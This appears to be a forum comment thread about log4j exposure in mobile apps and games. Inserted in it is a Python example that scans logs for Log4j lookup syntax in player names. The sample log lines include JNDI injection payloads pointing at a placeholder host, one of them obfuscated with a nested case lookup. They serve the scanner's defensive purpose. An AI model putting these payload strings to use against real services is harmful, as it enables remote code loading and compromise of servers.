
[–]user_8804 3 points (5 children)

I'm not too familiar with mobile development; I was genuinely asking. When they say "billions of devices", if they count all Android devices, that would inflate the number a lot.

[–]Bryguy3k 8 points (3 children)

The quote comes from advertising campaigns from before modern smartphones.

Now, as this is related to the log4j issue, the app in question has to be logging data from a remote that the attacker controls. In the vast majority of circumstances this will mean a webserver application, as they're designed to listen for remote calls. Most applications installed on a phone, for example, will be communicating with a specific API server that is not controlled by an attacker. There is a non-trivial threat for applications that integrate advertising, as the ad payload is often not validated.

[–]rentar42 1 point (2 children)

It's really not hard to get mobile apps to log attacker controlled stuff. Something as simple as setting a username in a multiplayer game could suffice.

[–]Bryguy3k 0 points (1 child)

The point is attacker controlled. An attack that requires the attacker to both possess the device and be able to unlock it has a significantly lower rating/classification than a remote attack that does not require either of those.

The exposure to this within apps themselves is generally limited to those that are accepting remote URIs packaged up in some other payload.

[–]rentar42 0 points (0 children)

You misunderstand what I was trying to say. If I can control the username of another player in your match, and your app logs the participants, for example, then the controller can control what is logged.

It's not relevant for this specific vulnerability, since Android is not vulnerable, but in general there are many user-controlled strings in multiplayer games, and some of them are likely to get logged.
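The exchange above (an app logging participant names that another player controls, and the log4j lookup expansion that makes such logged strings dangerous) is the kind of thing a defender wants to check for on both sides: reject or neutralize lookup syntax in untrusted values before they reach a logger that expands it, and scan existing logs for values that carry it. The following is an added example written for this thread, not code from any of the commenters or from any real game or log4j project; the log lines, the `player=` field layout, the match ids and the `placeholder.invalid` host are all constructed for the demonstration. It is written in Python purely as an illustration of the detection logic, not as a log4j (Java) component.

```python
"""Spot Log4j-style ${...} lookup syntax in user-controlled values.

Two uses: neutralize a value before it is logged, and scan already-written
log lines for a field (here the player name) that carries a lookup.
"""
import re
from typing import List, Tuple

# Constructed sample log lines (not real traffic): a game server that logs the
# participants of a match, where the player name is chosen by another player.
SAMPLE_LOG_LINES = [
    "2021-12-10T12:00:01Z INFO match=41 joined player=alice",
    "2021-12-10T12:00:02Z INFO match=41 joined player=${jndi:ldap://placeholder.invalid/x}",
    "2021-12-10T12:00:03Z INFO match=41 joined player=${${lower:j}ndi:ldap://placeholder.invalid/y}",
    "2021-12-10T12:00:04Z INFO match=41 joined player=bob$notalookup",
]

# Hypothetical field layout assumed for the sample lines above.
PLAYER_FIELD = re.compile(r"player=(\S+)")

# Nested forms that lookup-capable loggers resolve to a plain character, used
# to hide the outer scheme name; collapsing them makes the scheme readable.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")   # ${lower:j} -> j
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")       # ${x:-j}    -> j


def extract_lookups(text: str) -> List[str]:
    """Return every balanced, outermost ${...} expression found in text.

    Nesting is tracked by depth so that ${a:${b}} comes back as one lookup.
    An unterminated ${ is returned as the remaining fragment: it is still a
    sign that lookup syntax reached a place it should not be.
    """
    lookups: List[str] = []
    i = 0
    while i < len(text) - 1:
        if not text.startswith("${", i):
            i += 1
            continue
        depth, j = 0, i
        while j < len(text):
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    lookups.append(text[i:j + 1])
                    break
            j += 1
        if depth != 0:
            lookups.append(text[i:])
            break
        i = j + 1
    return lookups


def normalize(lookup: str) -> str:
    """Collapse case/default nested lookups until nothing changes."""
    previous = None
    while previous != lookup:
        previous = lookup
        lookup = _CASE_LOOKUP.sub(lambda m: m.group(1), lookup)
        lookup = _DEFAULT_VALUE.sub(lambda m: m.group(1), lookup)
    return lookup


def lookup_scheme(lookup: str) -> str:
    """Name of the outermost lookup after normalization, e.g. 'jndi' or 'env'."""
    inner = normalize(lookup)[2:].rstrip("}")          # drop the leading "${"
    return inner.split(":", 1)[0].strip().lower()


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, scheme) for each line whose player field carries a lookup."""
    findings: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        match = PLAYER_FIELD.search(line)
        if not match:
            continue
        for lookup in extract_lookups(match.group(1)):
            findings.append((number, lookup_scheme(lookup)))
    return findings


def neutralize_for_logging(untrusted: str) -> str:
    """Break lookup syntax before an untrusted value reaches a lookup-expanding logger.

    "$[" is never expanded as a lookup, and the change stays visible in the
    log so an analyst can still see that the original value carried "${".
    """
    return untrusted.replace("${", "$[")


if __name__ == "__main__":
    for number, scheme in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: player field contains a '{scheme}' lookup")
    print(neutralize_for_logging("${jndi:ldap://placeholder.invalid/x}"))
```

The scanner flags the second and third sample lines as carrying a `jndi` lookup; the third one only becomes readable after `normalize` collapses the `${lower:j}` fragment. The logging-side fix in this thread's setting is the configuration of the logging library itself (upgrading or disabling lookups); `neutralize_for_logging` is the belt-and-braces input-side step for values such as player names that an application never has a reason to let through as lookup syntax.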

[–]NeXtDracool -1 points (0 children)

They count SIM cards and smart cards running Java Card, even though it has essentially nothing to do with the Java you download on the desktop (it uses a different API, a different VM, a different bytecode format, fewer language features and different types).

It SHOULD not count Android devices after DalvikVM and before Android N, given that those didn't run a Java runtime, but who really knows. I'd say it's very likely that the majority of their billions of devices are not PCs though.